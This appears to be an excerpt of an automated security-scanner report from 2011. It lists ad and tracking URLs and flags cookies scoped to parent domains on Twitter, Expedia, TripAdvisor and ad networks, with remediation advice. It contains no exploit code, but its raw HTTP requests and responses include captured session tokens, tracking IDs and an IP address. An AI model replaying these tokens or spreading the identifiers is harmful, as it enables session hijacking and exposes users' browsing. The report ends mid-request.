http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000
http://d.xp1.ru4.com/meta
http://d.xp1.ru4.com/meta
http://d7.zedo.com/bar/v16-407/d3/jsc/fm.js
http://d7.zedo.com/bar/v16-407/d3/jsc/fmr.js
http://d7.zedo.com/bar/v16-407/d3/jsc/gl.js
http://d7.zedo.com/img/bh.gif
http://gdyn.nba.com/1.1/1.gif
http://glam.grapeshot.co.uk/main/redirect.cgi
http://ib.adnxs.com/ab
http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQOT9OVwPZpkL_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVwwBAgUCAQQAAAAAORo2aAAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http://www.twackle.com/headlines/clickenc=http://adclick.g.doubleclick.net/aclk
http://ib.adnxs.com/getuid
http://ib.adnxs.com/getuidnb
http://ib.adnxs.com/mapuid
http://ib.adnxs.com/ptj
http://ib.adnxs.com/ptj
http://ib.adnxs.com/seg
http://image2.pubmatic.com/AdServer/Pug
http://img137.imageshack.us/img137/4291/d5zee1.jpg
http://img690.imageshack.us/img690/7868/umadbroz.jpg
http://img851.imageshack.us/img851/8021/f7e22bda31624279b2e3f96.png
http://imp.constantcontact.com/imp/cmp.jsp
http://js.revsci.net/gateway/gw.js
http://load.exelator.com/load/
http://m.adnxs.com/msftcookiehandler
http://m.xp1.ru4.com/meta
http://media.fastclick.net/w/tre
http://media.photobucket.com/image/recent/Smirk_Dog/GIFS/MacSigDance.gif
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1341668853@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1540939750@Top1
http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/sbnation/ros/728x90/jx/ss/a/1760105225@Top1
http://optimized-by.rubiconproject.com/a/5941/13464/26379-2.js
http://optimized-by.rubiconproject.com/a/5941/13464/26379-9.js
http://p.brilig.com/contact/bct
http://pix04.revsci.net/A09801/b3/0/3/1008211/172737971.js
http://pix04.revsci.net/D10889/a1/0/3/0.gif
http://pix04.revsci.net/D10898/b3/0/3/1008211/466985162.js
http://pix04.revsci.net/D10898/b3/0/3/1008211/916907335.js
http://pix04.revsci.net/D10898/b3/0/3/1008211/98295750.js
http://pix04.revsci.net/E06560/b3/0/3/noscript.gif
http://pix04.revsci.net/G07610/b3/0/3/noscript.gif
http://pix04.revsci.net/H07710/b3/0/3/1003161/554831275.js
http://pix04.revsci.net/I09839/b3/0/3/0902121/61203636.js
http://pixel.invitemedia.com/data_sync
http://pixel.quantserve.com/pixel
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
http://pixel.rubiconproject.com/di.php
http://pixel.rubiconproject.com/tap.php
http://r.openx.net/set
http://r.turn.com/r/bd
http://r.turn.com/r/beacon
http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/
http://rs.gwallet.com/r1/pixel/x420r9190030
http://s.ugo.com/b/ss/hugougo,hugoglobal,hugougocw/1/H.20.3/s79206631665583
http://segments.adap.tv/data/
http://segs.btrll.com/v1/tpix/-/-/-/-/-/sid.6543418%22%20height=%221%22%20width=%221
http://services.krxd.net/geoip
http://services.krxd.net/pixel.gif
http://showadsak.pubmatic.com/AdServer/AdServerServlet
http://sis.amazon.com/iu
http://srv.clickfuse.com/pixels/delete.php
http://stgapi.choicestream.com/instr/csanywhere.js
http://sync.adap.tv/sync
http://sync.mathtag.com/sync
http://syndication.mmismm.com/tntwo.php
http://t.flux.com/tracking.gif
http://t.invitemedia.com/track_imp
http://tags.bluekai.com/site/2312
http://tags.bluekai.com/site/2731
http://tags.bluekai.com/site/2736
http://tags.bluekai.com/site/3113
http://tags.bluekai.com/site/353
http://tap.rubiconproject.com/oz/feeds/targus/profile
http://tap.rubiconproject.com/oz/sensor
http://tap.rubiconproject.com/partner/agent/rubicon/channels.js
http://tiger.vizu.com/a.gif
http://timecom.122.2o7.net/b/ss/timecom/1/H.20.2/s79694016552530
http://tr.adinterax.com/re/mcclatchyinteractive%2CDFW_Y_Star-tel_LB_0222%2CC%3DDFW_Mavericks%2CP%3DDFW-StarTelegram%2CK%3D492697/0.8334790775552392/0/in%2Cti/ti.gif
http://tvfanatic.us.intellitxt.com/intellitxt/front.asp
http://u.openx.net/w/1.0/sc
http://vap3den1.lijit.com/www/delivery/lg.php
http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s75181884909979
http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s77238202237058
http://vt.imiclk.com/cgi/vtc.cgi
http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp
http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx
http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp
http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp
http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp
http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp
http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp
http://www.expedia.com/hotel.h892034.Hotel-Information
http://www.imdb.com/title/tt0944947/
http://www.lijit.com/beacon
http://www.tiqiq.com/Tiqiq/PublisherHomePage.aspx
http://www.tiqiq.com/WebServices/EventsData.asmx/LogUserAction
http://www.wtp101.com/admeld_sync
http://www.wtp101.com/cox_sync
http://www22.glam.com/cTagsImgCmd.act

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

12.1. http://api.twitter.com/1/FanSided/lists//statuses.json previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/FanSided/lists//statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060; domain=.twitter.com; path=/; HttpOnly

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/FanSided/lists//statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1307962963626=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201; guest_id=130796296639680752; original_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK; external_referer=Bm9gjDJKLkNUA6KUQhqcURlVnkat6%2FAa0nQJRijFpP696HbzgOR%2BrPDoOcSsLUsQqgRs7aQNlpGXT0Ue1ThS%2BnB2T6v43msK%7C0; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIoBq4gwAToHaWQiJTY3MzNhYWQwMGYwZGZh%250AM2RjMzRjNGI0YmM4ODI3OGQ2IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e8cfadc4dddd72c57b26f1ed5cab8aa85cb06060

Response

12.2. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.expedia.com
Path:	/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; Domain=.expedia.com; Path=/
SSRT1=E_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:15 GMT
p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; Domain=.expedia.com; Expires=Sun, 12-Jun-2016 16:31:10 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSLB=1; SSRT1=yvL1TQE; iEAPID=0000,

Response

12.3. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tripadvisor.com
Path:	/img/cdsi/img2/ratings/partner/e4.0-13878-5.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

TASession=%1%V2ID.454F90E0D905C94A0FC63D5ED96F1B89*SQ.1*MC.13878*GR.92*TBR.99*EXEX.21*ABTR.38*HS.popularity*ES.popularity*AS.popularity*DS.5*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.expedia%5C.com%2FNew-York-Hotels-Millenium-Hilton%5C.h892034%5C.Hotel-Information%3Fchkin%3D7%252F14%252F2011%26hashTag%3Ddefault%26chkout%3D7%252F18%252F2011%26mcicid%3D112321680%26rm1%3Da2*TRA.true; Domain=.tripadvisor.com; Path=/
TAUnique=%1%enc%3AwEcEovk4vltd8LGI8QbYY0XbcR4szT2MJgwhg4A2d7o7HKcBniyy%2FA%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 10-Jun-2021 11:21:54 GMT; Path=/
TACds=A.1.13878.5.2011-06-12; Domain=.tripadvisor.com; Expires=Fri, 12-Aug-2011 11:21:54 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /img/cdsi/img2/ratings/partner/e4.0-13878-5.gif HTTP/1.1
Host: www.tripadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=45A5EF188B9EAB01

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:21:54 GMT
Server: Apache
expires: Mon, 13 Jun 2011 01:00:00 GMT
cache-control: max-age=43200
Last-Modified: Sun, 12 Jun 2011 01:00:00 GMT
Set-Cookie: TASession=%1%V2ID.454F90E0D905C94A0FC63D5ED96F1B89*SQ.1*MC.13878*GR.92*TBR.99*EXEX.21*ABTR.38*HS.popularity*ES.popularity*AS.popularity*DS.5*FP.CDSimp*RP.http%3A%2F%2Fwww%5C.expedia%5C.com%2FNew-York-Hotels-Millenium-Hilton%5C.h892034%5C.Hotel-Information%3Fchkin%3D7%252F14%252F2011%26hashTag%3Ddefault%26chkout%3D7%252F18%252F2011%26mcicid%3D112321680%26rm1%3Da2*TRA.true; Domain=.tripadvisor.com; Path=/
Set-Cookie: TAUnique=%1%enc%3AwEcEovk4vltd8LGI8QbYY0XbcR4szT2MJgwhg4A2d7o7HKcBniyy%2FA%3D%3D; Domain=.tripadvisor.com; Expires=Thu, 10-Jun-2021 11:21:54 GMT; Path=/
Set-Cookie: TACds=A.1.13878.5.2011-06-12; Domain=.tripadvisor.com; Expires=Fri, 12-Aug-2011 11:21:54 GMT; Path=/
Connection: close
Content-Type: image/gif
Content-Length: 2650

GIF89aC.................t...rtrz.gc.N),*..............p......n.Y[.Edd].........CEC..........\j............]T7..........................RUU............. 4............STO.tLC=)..]...........T..AX.B....
...[SNIP]...

12.4. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aSnermN3IdO9IdwKUNGF6K3SMvARsQTIPBNDfiG9vug6nk8TCZc5VyOrBJjGvQkUc8f4TyYxPVx5ER2fa87BPIslhpBT7dolqQw3qbqZcvZbLjoHM2Jwi6eBruiWQ1cqbl7Y4wgPRRmIYDWBcKSMp19f0QbnrFFX2aFsqmAugmpnPaLbE5r6LFm0ny7ZdBjLUwfcJKXX36T4GaHGbBvbP3h5k6hP6nLwDpOlZdZd8DHKWOQZcN7vuNGP82qNo4ZbwARVvHmEsHqXTaEVF3xxCm4m4yIPEmVXZcuDv1MRcZccKO9kZb0hslpZbbiiR6MVaD4GKNZd0QTos1qHleeZaZdx2RwXEnj6BSlUoUJ60sYbbWVBN2JHZb56rMS8xA0fsJ0Cf7T8ygmwbKPEXXXsiIFLLKyQMZafWjVuotmdwFDo9srsC3gcOufZaFTBRa21vX7nCjFU9O; path=/; domain=.tribalfusion.com; expires=Sun, 11-Sep-2011 11:03:08 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /i.cid?c=405233&d=30&page=landingPage HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/2011/06/13/10-observations-dallas-mavs-finals/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=ahnbZalm5abxmyuoZbUiEWfZbYQYiBp0DRJ2GwDyDaRZbMcAbT7asB59EFTR3fjwM1Wswi3HjrTERrtE8nabs9esa7EhhKWotblbYHVGaEGvUYZaDHeUf4LevQVv3WXyReIkC3Wqwi5QAFtZbDf5LUZbEVDnPPFJZb8C73dSsut9XDmbTHjMUZc3FXpZaARSpDpQBLqqGNLH8A3v35QbTTSwiTBEZdfZaZaAbLoHcaZa2FgMT4qaTTfqaUqtkWVygutFAbZbjUiWNFA6cYUaFZbV6CDVSaj9D9ZcaKP1TtZbcXJLJlNwGVK7W77DACL8ZcGv4ThWLS2ffxNGKl5TGXTE2gWLnnZbSDQjy2BZb2isShHslfcFcsSCG9v65oeEMvjqr4hwqIyIqc9Zdka6VayujZaLwdeluQw3PZdQUoBaR2P66OHEe03C

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 307
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aSnermN3IdO9IdwKUNGF6K3SMvARsQTIPBNDfiG9vug6nk8TCZc5VyOrBJjGvQkUc8f4TyYxPVx5ER2fa87BPIslhpBT7dolqQw3qbqZcvZbLjoHM2Jwi6eBruiWQ1cqbl7Y4wgPRRmIYDWBcKSMp19f0QbnrFFX2aFsqmAugmpnPaLbE5r6LFm0ny7ZdBjLUwfcJKXX36T4GaHGbBvbP3h5k6hP6nLwDpOlZdZd8DHKWOQZcN7vuNGP82qNo4ZbwARVvHmEsHqXTaEVF3xxCm4m4yIPEmVXZcuDv1MRcZccKO9kZb0hslpZbbiiR6MVaD4GKNZd0QTos1qHleeZaZdx2RwXEnj6BSlUoUJ60sYbbWVBN2JHZb56rMS8xA0fsJ0Cf7T8ygmwbKPEXXXsiIFLLKyQMZafWjVuotmdwFDo9srsC3gcOufZaFTBRa21vX7nCjFU9O; path=/; domain=.tribalfusion.com; expires=Sun, 11-Sep-2011 11:03:08 GMT;
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,........@..D..;

12.5. http://a.tribalfusion.com/j.ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ANON_ID=aunbZalwl6hwUQQwgQWaCFyUS7jC64OywUPxH2ILm35hSvP9FsxMpesmpvZcKIfCWWhrWEmo3P82WbGmlrZcx7bYZcZagpWnmhairy6ma7rJZb2NA6HsUJcwdNZbaPZbs2Nb2PgQrirwuO5T3mBsjwZc6n329ruwdYsDmIQ7to3tB6ZbwdyuKZdUaV6IeZa6gVVsdAjeJs9ZbZdtfPYtQy64XCxNZbT2vFeEwZcUhxDbMG3sd2QOYL4sMr8S6l69wgJv8EFFJpVNHeKr2s5HQjHcaZaCpNZbbEH2knc7WVZdZabLZbtd2tiHRgguDn7ZbQWcZadvasxxutMZbZc2ZaRSlNF5RWY19DxXQitC0MEEI47DNRp0PjrdGsSqaacIlhxZdI4vpqUc0rpTZc7aHdZbYPuRtTDii50fytO3ZdYrKafhLEVreCmBvXQYii; path=/; domain=.tribalfusion.com; expires=Sun, 11-Sep-2011 11:02:24 GMT;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=audienceselectpublishers&adSpace=audienceselect&tagKey=2057624979&th=24047165603&tKey=undefined&size=1x1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fd13.zedo.com%2FOzoDB%2Fcutils%2FR53_5_5%2Fjsc%2F1190%2Fzpu.html%3Fn%3D1190%3Bf%3D1%3Bz%3D2-110&f=2&p=2878727&a=1&rnd=2881031 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1190
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=a7naT8wyEotDuMNqbZbFsBeTQfZcZcokn03esq9uAF6MIkCbIlTo7vDItv8MGHeYQ4C1t46P91aVv0cKKcq4vAtMFBZbS8vP9QcVUsWbeeDfnOJ6daQwkcahX1r4DYycET963HOvm4UFQqBTF1Za9UQTQ2TwryoLQU2aTRkvSAbwpTjIymP1CZagBCN6O9W8GK2nDllp7BUF0yYtttSDiqZaDEge2IdxJHHbbys9KU5JNxqyD99rkZcJN7ZcMsN7jQw4aCQbL6iRUJiTZbFiu5FkFuPpk1nqfdbyZcq0rdpZdtZd05K0vCPrHLgtZddiPAZa0BZcXWCHB2DZa9uTCBt0RpbFbjrcvZcJ1ESOnn5xZd7Yt9UhG2aTJr8btXEM1SHNpkGK9bsdD3NTEJ7MN5fJLNl2Cq3WM6O

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aunbZalwl6hwUQQwgQWaCFyUS7jC64OywUPxH2ILm35hSvP9FsxMpesmpvZcKIfCWWhrWEmo3P82WbGmlrZcx7bYZcZagpWnmhairy6ma7rJZb2NA6HsUJcwdNZbaPZbs2Nb2PgQrirwuO5T3mBsjwZc6n329ruwdYsDmIQ7to3tB6ZbwdyuKZdUaV6IeZa6gVVsdAjeJs9ZbZdtfPYtQy64XCxNZbT2vFeEwZcUhxDbMG3sd2QOYL4sMr8S6l69wgJv8EFFJpVNHeKr2s5HQjHcaZaCpNZbbEH2knc7WVZdZabLZbtd2tiHRgguDn7ZbQWcZadvasxxutMZbZc2ZaRSlNF5RWY19DxXQitC0MEEI47DNRp0PjrdGsSqaacIlhxZdI4vpqUc0rpTZc7aHdZbYPuRtTDii50fytO3ZdYrKafhLEVreCmBvXQYii; path=/; domain=.tribalfusion.com; expires=Sun, 11-Sep-2011 11:02:24 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 368
Expires: 0
Connection: keep-alive

document.write('<center><a target=_blank href="http://a.tribalfusion.com/h.click/atmMvfUVr52rXomH6OYTTx2t3ZdQVfH26nZamdAOUWfdXrfaYrUeXaeMRUJHTUQPVd31mrZbxPFvoXTrs3TZba4q71oTjG1FjfTHfQoAMDnVYwoWQG3Eri5
...[SNIP]...

12.6. http://ad.afy11.net/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.afy11.net
Path:	/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

s=1,2*4dd07bca*NvChYAti9s*0w_pNHxf_8VrLDq_uXx_kJUKiw==*,5*4dd6e1af*PUU08f4La8*LQiO98snWSTGG0FY8w==*,6*4de0098c*TwWpFxNd6J*fLFPASmaLni1foeSQ_vjnSAO1u5wSGan6LkNv_5Cw9cn0lidw85vRQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad?mode=7&publisher_dsp_id=2&external_user_id=4325897289836481830 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=sI4Tbbg0RUmet4nXF3tmVw; s=1,2*4dd07bca*imOhc4vXYJ*s_Hxe6S9FCQKpU9c2waH1Df7Mg==*,5*4dd6e1af*PUU08f4La8*LQiO98snWSTGG0FY8w==*,6*4de0098c*TwWpFxNd6J*fLFPASmaLni1foeSQ_vjnSAO1u5wSGan6LkNv_5Cw9cn0lidw85vRQ==*; c=AQEBAAAAAAA2zEkFGe71TQAAAAAAAAAAAAAAAAAAAAAa7vVNAQABALkhJNXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvr73U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: image/gif
Content-Length: 45
Set-Cookie: s=1,2*4dd07bca*NvChYAti9s*0w_pNHxf_8VrLDq_uXx_kJUKiw==*,5*4dd6e1af*PUU08f4La8*LQiO98snWSTGG0FY8w==*,6*4de0098c*TwWpFxNd6J*fLFPASmaLni1foeSQ_vjnSAO1u5wSGan6LkNv_5Cw9cn0lidw85vRQ==*; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

GIF89a.............!.......,...........D..;if

12.7. http://ad.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAUabUl55ctWfbz4_8QgoT4EM3BowwDA3gBY2BgYGJg2u7OwOqZzMBoHsLA8MuMgYGBk4GB0aBj17NXDEwZjxhYnv5iYFRbxcBwLx8mJ3NDdTmQDQa.X4MZGLgYGOQrGWUYGRhYNjCKAikGA0YGIJU.FSyoeIKRG8hbvhQst84DTEktYeQHCi46B1a5rJ5REMgD2_saYjIANIEckg--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:20:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=i&f=j&p=5112&pl=bb7d104a&rnd=91083618276752530&clkurl=http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQOT9OVwPZpkL_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVwwBAgUCAQQAAAAAORo2aAAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http%3A%2F%2Fwww.twackle.com%2Fheadlines/clickenc=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBbxFBY_L1TdzJOMz8lQfJmaHxCNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB%26num%3D1%26sig%3DAGiWqtzcCewhlJyOrX67IKiuPDRQp5MYXg%26client%3Dca-pub-7494156027018342%26adurl%3D HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
